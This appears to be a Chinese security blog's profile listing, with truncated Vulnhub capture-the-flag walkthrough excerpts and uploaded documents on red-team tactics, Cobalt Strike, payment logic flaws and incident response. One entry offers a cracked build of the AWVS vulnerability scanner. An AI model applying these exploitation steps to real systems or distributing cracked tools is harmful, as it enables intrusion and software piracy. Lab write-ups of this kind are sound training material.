0X00 前言Raven 2中一共有四个flag,Raven 2是一个中级boot2root VM。有四个标志要捕获。在多次破坏之后,Raven Security采取了额外措施来强化他们的网络服务器,以防止黑客进入。靶机下载地址:https://download.vulnhub.com/raven/Raven2.ova0x01 发现存活主机该虚拟机默认是NAT模式...
原创
299阅读
0评论
0点赞
发布博客于 2 年前

域渗透.pdf

域渗透。 pdf
pdf
发布资源于 2 年前

cobalt-strike.pdf

cobalt-strike.pdf cobalt-strike 使用手册,官方教程
pdf
发布资源于 2 年前

CVE-2019-1181&1182;修复工具.rar

CVE-2019-1181&1182;修复工具 腾讯出 的 RDS 修复工具
rar
发布资源于 2 年前

AWVS12 windows20190822.rar

AWVS12 windows20190822 破解版 亲测可用,首次进入需要关闭自动更新!
rar
发布资源于 2 年前

实战攻防之蓝队视角下的防御体系构建.docx

实战攻防之蓝队视角下的防御体系构建 实战攻防之蓝队视角下的防御体系构建
docx
发布资源于 2 年前

实战攻防之红队视角下的防御体系突破.docx

实战攻防之红队视角下的防御体系突破
docx
发布资源于 2 年前

Motrix--1.3.8.rar

Motrix-Setup 一款开源的下载器,支持多线程,完全免费,下载速度贼快!
rar
发布资源于 2 年前

wsl-terminal-0.8.13.7z

wsl-terminal 一款适用于windows系统的命令行工具,界面美观,功能强大!
7z
发布资源于 2 年前

逻辑漏洞突破.txt

支付漏洞突破口 一、订单相关 1.选择商品时修改商品价格 2.选择商品时将商品数量设为负数 3.商品库存为1时,多人同时购买,是否产生冲突 4.商品库存为0时,是否还能购买 5.生成订单时,修改订单金额
txt
发布资源于 2 年前

勒索病毒应急处置流程 _ Micr067's blog.pdf

勒索病毒应急处置流程
pdf
发布资源于 2 年前

应急响应技术指南(1).doc

应急响应技术指南(1).doc
doc
发布资源于 2 年前

BASIC-PENTESTING-1 靶机提权

basic-pentesting-1https://www.vulnhub.com/entry/basic-pentesting-1,216/获取ip地址端口扫描,服务识别根据服务版本搜索相关漏洞通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有于是使用msf 搜索漏洞模块并利用use exploit/unix/ftp/proftpd...
原创
308阅读
0评论
0点赞
发布博客于 2 年前

SICKOS 1.2 WALKTHROUGH

SickOs:1.2https://www.vulnhub.com/entry/sickos-12,144/首先获取目标ip地址,并探测端口netdiscover -i eth0 -r 192.168.88.1/24访问web,并查看源码,没有什么有用的东西目录发现dirbhttp://192.168.88.201nikto -hhtt...
原创
176阅读
0评论
0点赞
发布博客于 2 年前

BTRSYS 2.1 WALKTHROUGH

BTRSys 2.1https://www.vulnhub.com/entry/btrsys-v21,196/1.确定目标ip2.端口和服务探测根据vsftp版本没有找到相关漏洞利用代码然后我们转战web查看页面代码,前端源代码中也没有什么有意义的东西nikto -h 192.168.88.199 发现在robots.txt 文件中 存在 wo...
原创
212阅读
0评论
0点赞
发布博客于 2 年前

DROOPYCTF WALKTHROUGH

droopyCTFhttps://www.vulnhub.com/?q=droopy&sort=date-des&type=vmCTF镜像合集:https://www.vulnhub.com/?page=18参考:https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/1.获取目标ip地址,并进行...
原创
116阅读
0评论
0点赞
发布博客于 2 年前